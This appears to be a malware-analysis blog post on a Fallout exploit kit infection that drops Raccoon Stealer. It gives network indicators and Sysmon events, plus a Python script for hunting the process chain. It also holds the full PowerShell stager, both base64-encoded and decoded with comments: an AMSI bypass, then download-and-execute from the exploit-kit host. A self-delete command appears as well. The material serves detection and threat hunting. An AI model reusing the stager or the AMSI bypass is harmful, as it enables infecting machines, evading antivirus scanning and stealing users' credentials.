Fallout Exploit Kit delivers Raccoon Stealer

NOTE: Some of the base64 PowerShell runs off the edge of the blog page. Using “Reader View” in your browser will show the complete PowerShell scripts.

The initial redirect was shared in a tweet by @adrian__luca. He is a great source who often shares exploit kit indicators. Another great Twitter account for exploit kit indicators is @tkanalyst.

I have added a zipped pcap file for your analysis. The password for the zipped pcap is “infected” (all lowercase).

PCAP file of the infection traffic:
2019-11-18-FalloutEK-pcap.zip

ASSOCIATED DOMAINS AND IPs:

18.213.92.41 – sp.popcash.net GET /go/213593/460404 – Redirect to Fallout EK
91.213.11.6 – ecoink.ro – Redirect to Fallout EK
136.244.99.131 – kiotoname.com – Fallout EK
216.58.211.46 – drive.google.com – Hosting payload
35.189.105.242 – POST /gate/log.php – Raccoon Stealer C2
35.189.105.242 – POST /file_handler/file.php – Raccoon Stealer C2

ASSOCIATED PROCESS BEHAVIOR FOR HUNTING ENDPOINTS:

[Sysmon Event 3] – Internet Explorer communicating with Fallout EK
Image C:\Program Files\Internet Explorer\iexplore.exe
Protocol tcp
SourceIp 192.168.2.24
DestinationIp 136.244.99.131
DestinationHostname 136.244.99.131.vultr.com
DestinationPort 443
DestinationPortName https

[Sysmon Event 1] – Fallout EK exploit – BASE64 ENCODED COMMAND (DECODED BELOW)
Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine powershell.exe -w hidden -noni -enc [base64 blob omitted here; it is the same encoded command that appears in full as the ParentCommandLine of the csc.exe event below]
CurrentDirectory C:\Users\Toby\Desktop\
Hashes MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7
ParentImage C:\Program Files\Internet Explorer\iexplore.exe
ParentCommandLine "C:\Program Files\Internet Explorer\iexplore.exe"

[ABOVE BASE64 DECODED]
# Reflowed with # comments added; the nested base64 literals are decoded in the comments.
# 1. AMSI bypass: reflectively set System.Management.Automation.AmsiUtils.amsiInitFailed = $true so
#    AMSI believes initialisation failed and stops scanning this PowerShell session. Both the type
#    name and the field name are base64-encoded so neither string appears in the command line.
try{
  $IIlIII=[Ref].Assembly;
  $lllI11IlIIIl=$IIlIII.GetType([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('U3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5BbXNpVXRpbHM=')));  # decodes to 'System.Management.Automation.AmsiUtils'
  $l11111III1=$lllI11IlIIIl.GetField([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('YW1zaUluaXRGYWlsZWQ=')),'NonPublic,Static');  # decodes to 'amsiInitFailed'
  $l11111III1.SetValue($null,$true);
}catch{};
# 2. P/Invoke stub for kernel32!CreateProcess. ll11l1I1 is PROCESS_INFORMATION and lllI1l1I1l is
#    STARTUPINFO (field order matches the Win32 structs). Add-Type compiles this with csc.exe, which
#    is the csc.exe / cvtres.exe activity in the next two events.
Add-Type -TypeDefinition "using System;using System.Diagnostics;using System.Runtime.InteropServices;
[StructLayout(LayoutKind.Sequential)]public struct ll11l1I1{public IntPtr lI11l1l1;public IntPtr lI1IIII;public uint Il11l11l;public uint IIll1I111;}
[StructLayout(LayoutKind.Sequential,CharSet=CharSet.Unicode)]public struct lllI1l1I1l{public uint ll11II11;public string I1111IIl;public string lIlIll;public string Ill11II;public uint llIIIIl;public uint I1I1l11;public uint l1II1;public uint IllI11111;public uint ll11Il;public uint lIII1IlIll;public uint IllllIl1;public uint lII1ll;public short lIIlll1I;public short III1Il;public IntPtr l11Il;public IntPtr ll1I11ll;public IntPtr I11I1ll;public IntPtr llI1llII11;};
public static class llIl11llI1{[DllImport(""kernel32.dll"",SetLastError=true)]public static extern bool CreateProcess(string l11ll1,string lIlllIl,IntPtr lIllI,IntPtr I1IIll1,bool I1lI1l,uint I1111II1lIl1,IntPtr I1I1I,string ll1l11,ref lllI1l1I1l l1I111l11llI,out ll11l1I1 IIIl1IIII1I);}";
# 3. Drop path: %USERPROFILE%\AppData\LocalLow\<8 random alphanumerics>.tmp (AyJWa1N0.tmp in this run).
$lll11Illl="$env:userprofile\AppData\LocalLow\$(-join((48..57)+(65..90)+(97..122)|Get-Random -Count 8|%{[char]$_})).tmp";
$l1llIII='https://kiotoname.com/4384/Ezx/Livetrap_slayable_verismos/Jewbird';
# 4. Download. The base64 literal below decodes to:
#    $cli=(New-Object Net.WebClient);$cli.Headers['User-Agent']='b5v297It2iQ3gul4';$cli.DownloadFile($l1llIII,$lll11Illl);
#    i.e. the payload is fetched with the hard-coded User-Agent b5v297It2iQ3gul4, a usable network indicator.
[Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('JGNsaT0oTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KTskY2xpLkhlYWRlcnNbJ1VzZXItQWdlbnQnXT0nYjV2Mjk3SXQyaVEzZ3VsNCc7JGNsaS5Eb3dubG9hZEZpbGUoJGwxbGxJSUksJGxsbDExSWxsbCk7'))|iex;
# 5. Run the dropped file with CreateProcess, dwCreationFlags=0x00000008 (DETACHED_PROCESS) and
#    wShowWindow=0, so no console window is shown. This is the AyJWa1N0.tmp process creation below.
$IlllI=New-Object lllI1l1I1l;
$IlllI.lIIlll1I=0x0;
$IlllI.ll11II11=[System.Runtime.InteropServices.Marshal]::SizeOf($IlllI);
$IIll1Il1II1I=New-Object ll11l1I1;
[llIl11llI1]::CreateProcess($lll11Illl,$lll11Illl,[IntPtr]::Zero,[IntPtr]::Zero,$false,0x00000008,[IntPtr]::Zero,"c:",[ref]$IlllI,[ref]$IIll1Il1II1I)|out-null;

[Sysmon Event 1] – csc.exe spawned by PowerShell (Add-Type compiling the P/Invoke stub from the decoded script; the same PowerShell -> csc.exe pattern is also used for AppLocker bypass, which is why it is worth hunting)
Image C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
CommandLine "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Toby\AppData\Local\Temp\eyygh-mn.cmdline"
CurrentDirectory C:\Users\Toby\Desktop\
Hashes MD5=3D7D2E825C63FF501E896CF008C70D75,SHA256=037FC52B8FC6089338EB456F2B45638ED36C42A4DCA7ACE391D166B2329838A1
ParentImage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine powershell.exe -w hidden -noni -enc dAByAHkAewAkAEkASQBsAEkASQBJAD0AWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5ADsAJABsAGwAbABJADEAMQBJAGwASQBJAEkAbAA9ACQASQBJAGwASQBJAEkALgBHAGUAdABUAHkAcABlACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAFUAMwBsAHoAZABHAFYAdABMAGsAMQBoAGIAbQBGAG4AWgBXADEAbABiAG4AUQB1AFEAWABWADAAYgAyADEAaABkAEcAbAB2AGIAaQA1AEIAYgBYAE4AcABWAFgAUgBwAGIASABNAD0AJwApACkAKQA7ACQAbAAxADEAMQAxADEASQBJAEkAMQA9ACQAbABsAGwASQAxADEASQBsAEkASQBJAGwALgBHAGUAdABGAGkAZQBsAGQAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAWQBXADEAegBhAFUAbAB1AGEAWABSAEcAWQBXAGwAcwBaAFcAUQA9ACcAKQApACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7ACQAbAAxADEAMQAxADEASQBJAEkAMQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACQAdAByAHUAZQApADsAfQBjAGEAdABjAGgAewB9ADsAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAiAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AFsAUwB0AHIAdQBjAHQATABhAHkAbwB1AHQAKABMAGEAeQBvAHUAdABLAGkAbgBkAC4AUwBlAHEAdQBlAG4AdABpAGEAbAApAF0AcAB1AGIAbABpAGMAIABzAHQAcgB1AGMAdAAgAGwAbAAxADEAbAAxAEkAMQB7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABsAEkAMQAxAGwAMQBsADEAOwBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAAbABJADEASQBJAEkASQA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkAbAAxADEAbAAxADEAbAA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkASQBsAGwAMQBJADEAMQAxADsAfQBbAFMAdAByAHUAYwB0AEwAYQB5AG8AdQB0ACgATABhAHkAbwB1AHQASwBpAG4AZAAuAFMAZQBxAHUAZQBuAHQAaQBhAGwALABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAFUAbgBpAGMAbwBkAGUAKQBdAHAAdQBiAGwAaQBjACAAcwB0AHIAdQBjAHQAIABsAGwAbABJADEAbAAxAEkAMQBsAHsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAbABsADEAMQBJAEkAMQAxADsAcAB1AGIAbABpAGMAIABzAHQAcgBpAG4AZw
AgAEkAMQAxADEAMQBJAEkAbAA7AHAAdQBiAGwAaQBjACAAcwB0AHIAaQBuAGcAIABsAEkAbABJAGwAbAA7AHAAdQBiAGwAaQBjACAAcwB0AHIAaQBuAGcAIABJAGwAbAAxADEASQBJADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAbABsAEkASQBJAEkAbAA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkAMQBJADEAbAAxADEAOwBwAHUAYgBsAGkAYwAgAHUAaQBuAHQAIABsADEASQBJADEAOwBwAHUAYgBsAGkAYwAgAHUAaQBuAHQAIABJAGwAbABJADEAMQAxADEAMQA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAGwAbAAxADEASQBsADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAbABJAEkASQAxAEkAbABJAGwAbAA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkAbABsAGwAbABJAGwAMQA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAGwASQBJADEAbABsADsAcAB1AGIAbABpAGMAIABzAGgAbwByAHQAIABsAEkASQBsAGwAbAAxAEkAOwBwAHUAYgBsAGkAYwAgAHMAaABvAHIAdAAgAEkASQBJADEASQBsADsAcAB1AGIAbABpAGMAIABJAG4AdABQAHQAcgAgAGwAMQAxAEkAbAA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABsAGwAMQBJADEAMQBsAGwAOwBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAASQAxADEASQAxAGwAbAA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABsAGwASQAxAGwAbABJAEkAMQAxADsAfQA7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABsAGwASQBsADEAMQBsAGwASQAxAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACIALABTAGUAdABMAGEAcwB0AEUAcgByAG8AcgA9AHQAcgB1AGUAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACgAcwB0AHIAaQBuAGcAIABsADEAMQBsAGwAMQAsAHMAdAByAGkAbgBnACAAbABJAGwAbABsAEkAbAAsAEkAbgB0AFAAdAByACAAbABJAGwAbABJACwASQBuAHQAUAB0AHIAIABJADEASQBJAGwAbAAxACwAYgBvAG8AbAAgAEkAMQBsAEkAMQBsACwAdQBpAG4AdAAgAEkAMQAxADEAMQBJAEkAMQBsAEkAbAAxACwASQBuAHQAUAB0AHIAIABJADEASQAxAEkALABzAHQAcgBpAG4AZwAgAGwAbAAxAGwAMQAxACwAcgBlAGYAIABsAGwAbABJADEAbAAxAEkAMQBsACAAbAAxAEkAMQAxADEAbAAxADEAbABsAEkALABvAHUAdAAgAGwAbAAxADEAbAAxAEkAMQAgAEkASQBJAGwAMQBJAEkASQBJADEASQApADsAfQAiADsAJABsAGwAbAAxADEASQBsAGwAbAA9ACIAJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwATABvAHcAXAAkACgALQBqAG8AaQBuACgAKAA0ADgALgAuADUANwApACsAKAA2ADUALgAuADkAMAApACsAKAA5ADcALgAuADEAMgAyACkAfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4AHwAJQB7AFsAYwBoAGEAcgBdACQAXw
B9ACkAKQAuAHQAbQBwACIAOwAkAGwAMQBsAGwASQBJAEkAPQAnAGgAdAB0AHAAcwA6AC8ALwBrAGkAbwB0AG8AbgBhAG0AZQAuAGMAbwBtAC8ANAAzADgANAAvAEUAegB4AC8ATABpAHYAZQB0AHIAYQBwAF8AcwBsAGEAeQBhAGIAbABlAF8AdgBlAHIAaQBzAG0AbwBzAC8ASgBlAHcAYgBpAHIAZAAnADsAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAEoARwBOAHMAYQBUADAAbwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBPAFoAWABRAHUAVgAyAFYAaQBRADIAeABwAFoAVwA1ADAASwBUAHMAawBZADIAeABwAEwAawBoAGwAWQBXAFIAbABjAG4ATgBiAEoAMQBWAHoAWgBYAEkAdABRAFcAZABsAGIAbgBRAG4AWABUADAAbgBZAGoAVgAyAE0AagBrADMAUwBYAFEAeQBhAFYARQB6AFoAMwBWAHMATgBDAGMANwBKAEcATgBzAGEAUwA1AEUAYgAzAGQAdQBiAEcAOQBoAFoARQBaAHAAYgBHAFUAbwBKAEcAdwB4AGIARwB4AEoAUwBVAGsAcwBKAEcAeABzAGIARABFAHgAUwBXAHgAcwBiAEMAawA3ACcAKQApAHwAaQBlAHgAOwAkAEkAbABsAGwASQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABsAGwAbABJADEAbAAxAEkAMQBsADsAJABJAGwAbABsAEkALgBsAEkASQBsAGwAbAAxAEkAPQAwAHgAMAA7ACQASQBsAGwAbABJAC4AbABsADEAMQBJAEkAMQAxAD0AWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAUwBpAHoAZQBPAGYAKAAkAEkAbABsAGwASQApADsAJABJAEkAbABsADEASQBsADEASQBJADEASQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABsAGwAMQAxAGwAMQBJADEAOwBbAGwAbABJAGwAMQAxAGwAbABJADEAXQA6ADoAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAoACQAbABsAGwAMQAxAEkAbABsAGwALAAkAGwAbABsADEAMQBJAGwAbABsACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAJABmAGEAbABzAGUALAAwAHgAMAAwADAAMAAwADAAMAA4ACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAIgBjADoAIgAsAFsAcgBlAGYAXQAkAEkAbABsAGwASQAsAFsAcgBlAGYAXQAkAEkASQBsAGwAMQBJAGwAMQBJAEkAMQBTobyAfABvAHUAdAAtAG4AdQBsAGwAOwA=

[Sysmon Event 1] – cvtres.exe spawned by csc.exe (resource converter run as part of the same Add-Type compile)
Image C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
CommandLine C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Toby\AppData\Local\Temp\RES9732.tmp" "c:\Users\Toby\AppData\Local\Temp\CSC9731.tmp"
CurrentDirectory C:\Users\Toby\Desktop\
User Toby-PC\Toby
Hashes MD5=ED797D8DC2C92401985D162E42FFA450,SHA256=B746362010A101CB5931BC066F0F4D3FC740C02A68C1F37FC3C8E6C87FD7CB1E
ParentImage C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
ParentCommandLine "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Toby\AppData\Local\Temp\eyygh-mn.cmdline"

[Sysmon Event 1] – Dropped payload (AyJWa1N0.tmp) launched by PowerShell via CreateProcess
Image C:\Users\Toby\AppData\LocalLow\AyJWa1N0.tmp
CommandLine C:\Users\Toby\AppData\LocalLow\AyJWa1N0.tmp
CurrentDirectory C:\Users\Toby\Desktop\
Hashes MD5=D0F59C703FD576CF49EB48AB4CF4743C,SHA256=D8656F5E9B503214E375F94BEC677CF69FB16057EAE7AB66AD7CAAB1B517D7D6
ParentImage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine powershell.exe -w hidden -noni -enc [base64 blob omitted here; same encoded command as the ParentCommandLine of the csc.exe event above]

[Sysmon Event 3] – PowerShell downloading the payload from Fallout EK (kiotoname.com, 136.244.99.131)
Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Protocol tcp
SourceIp 192.168.2.24
DestinationIp 136.244.99.131
DestinationHostname 136.244.99.131.vultr.com

[Sysmon Event 3] – Dropped payload (AyJWa1N0.tmp) communicating with Google Drive
Image C:\Users\Toby\AppData\LocalLow\AyJWa1N0.tmp
Protocol tcp
SourceIp 192.168.2.24
DestinationIp 216.58.211.46
DestinationHostname mad08s05-in-f14.1e100.net
DestinationPort 443
DestinationPortName https

[Sysmon Event 3] – Payload communicating with Raccoon C2
Image C:\Users\Toby\AppData\LocalLow\AyJWa1N0.tmp
Protocol tcp
SourceIp 192.168.2.24
DestinationIp 35.189.105.242
DestinationHostname
DestinationPort 80
DestinationPortName http

[Sysmon Event 1] – Raccoon Stealer deleting itself from the compromised host (ping used as a short delay, then del of its own image)
Image C:\Windows\System32\cmd.exe
CommandLine cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Toby\AppData\LocalLow\AyJWa1N0.tmp"
CurrentDirectory C:\Users\Toby\Desktop\
User Toby-PC\Toby
Hashes MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE
ParentImage C:\Users\Toby\AppData\LocalLow\AyJWa1N0.tmp
ParentCommandLine C:\Users\Toby\AppData\LocalLow\AyJWa1N0.tmp

[Sysmon Event 1] – PING.EXE spawned by the self-delete command (the ping only provides the delay before del runs)
Image C:\Windows\System32\PING.EXE
CommandLine ping 1.1.1.1 -n 1 -w 3000
CurrentDirectory C:\Users\Toby\Desktop\
Hashes MD5=6242E3D67787CCBF4E06AD2982853144,SHA256=4CA10DBA7FF487FDB3F1362A3681D7D929F5AA1262CDFD31B04C30826983FB
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Toby\AppData\LocalLow\AyJWa1N0.tmp"
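The Sysmon events above form one process chain: iexplore.exe -> powershell.exe (-enc) -> csc.exe / cvtres.exe plus the dropped .tmp in AppData\LocalLow -> cmd.exe deleting that .tmp after a ping delay. The following Python is an added example, not code from this post, showing how to hunt that chain as parent/child relationships rather than as individual hashes (hashes change per build; the chain shape does not). The records are constructed from the events listed above with invented ProcessGuid/ParentProcessGuid values (the page does not show them) and one benign PowerShell launch as a control; hashes are omitted.

```python
"""Hunt the Fallout -> PowerShell -> dropped .tmp -> self-delete chain in
Sysmon Event 1 records.

Added example, not code from the blog post. SAMPLE_EVENTS is constructed
from the page's events (Image, CommandLine, ParentImage) with made-up
ProcessGuid/ParentProcessGuid values so parent/child links resolve.
"""
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]
Finding = Tuple[str, List[str]]  # (rule name, process chain root -> leaf)

BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
# -EncodedCommand accepts any unambiguous prefix (-e, -ec, -enc, ...)
_ENC_FLAG = re.compile(r"-e(?:c|n[a-z]*)?\b", re.IGNORECASE)
# "ping <x> ... & del [/f /q] <path>": ping is the sleep, del removes the file
_SELF_DELETE = re.compile(r"\bping\b.*?&\s*del\s+(?:/\w+\s+)*\"?([^\"]+?)\"?\s*$", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(event: Event, by_guid: Dict[str, Event], max_depth: int = 8) -> List[str]:
    """Image basenames from the oldest resolvable ancestor down to this process."""
    chain = [event]
    while len(chain) <= max_depth:
        parent = by_guid.get(chain[-1].get("ParentProcessGuid", ""))
        if parent is None:
            break
        chain.append(parent)
    return [_basename(e["Image"]) for e in reversed(chain)]


def hunt(events: List[Event]) -> List[Finding]:
    """Apply the chain rules to a list of Event 1 records; findings keep event order."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    findings: List[Finding] = []
    for e in events:
        img = _basename(e["Image"])
        parent_path = e.get("ParentImage", "")
        parent = _basename(parent_path)
        cmd = e.get("CommandLine", "")
        chain = ancestry(e, by_guid)

        # Browser spawning PowerShell with an encoded command: the exploit landing
        if img == "powershell.exe" and parent in BROWSERS and _ENC_FLAG.search(cmd):
            findings.append(("browser_spawned_encoded_powershell", chain))
        # Add-Type compiling the P/Invoke stub (also the csc.exe AppLocker-bypass shape)
        if img == "csc.exe" and parent == "powershell.exe":
            findings.append(("powershell_addtype_compile", chain))
        # PowerShell launching a .tmp out of AppData\LocalLow as a process
        if parent == "powershell.exe" and "\\appdata\\locallow\\" in e["Image"].lower() and img.endswith(".tmp"):
            findings.append(("powershell_ran_tmp_from_locallow", chain))
        # cmd.exe told to delete exactly its own parent's image after a ping delay
        m = _SELF_DELETE.search(cmd) if img == "cmd.exe" else None
        if m and m.group(1).strip().lower() == parent_path.lower():
            findings.append(("self_delete_of_parent", chain))
    return findings


# Constructed from the page's Sysmon Event 1 entries; GUIDs are invented and the
# encoded blob is shortened to a few characters (its shape is all the rule needs).
SAMPLE_EVENTS: List[Event] = [
    {"ProcessGuid": "{ie}", "ParentProcessGuid": "", "ParentImage": "",
     "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "CommandLine": r'"C:\Program Files\Internet Explorer\iexplore.exe"'},
    {"ProcessGuid": "{ps}", "ParentProcessGuid": "{ie}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -noni -enc dAByAHkAewAkAEkA",
     "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe"},
    {"ProcessGuid": "{csc}", "ParentProcessGuid": "{ps}",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Toby\AppData\Local\Temp\eyygh-mn.cmdline"',
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"ProcessGuid": "{tmp}", "ParentProcessGuid": "{ps}",
     "Image": r"C:\Users\Toby\AppData\LocalLow\AyJWa1N0.tmp",
     "CommandLine": r"C:\Users\Toby\AppData\LocalLow\AyJWa1N0.tmp",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"ProcessGuid": "{cmd}", "ParentProcessGuid": "{tmp}",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Toby\AppData\LocalLow\AyJWa1N0.tmp"',
     "ParentImage": r"C:\Users\Toby\AppData\LocalLow\AyJWa1N0.tmp"},
    # Benign control: an admin script launched from Explorer must not fire anything
    {"ProcessGuid": "{adm}", "ParentProcessGuid": "",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for rule, chain in hunt(SAMPLE_EVENTS):
        print(f"{rule}: {' -> '.join(chain)}")
```

The self-delete rule deliberately requires the deleted path to equal the parent's own image: "ping then del" alone is common in installers and cleanup scripts, but a process asking cmd.exe to remove its own executable after it exits is the behaviour that matters here.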

IMAGES AND DETAILS:

[Image not reproduced here] Network traffic associated with the Fallout Exploit Kit and Raccoon Stealer infection

[Image not reproduced here] Post-infection traffic associated with the Raccoon Stealer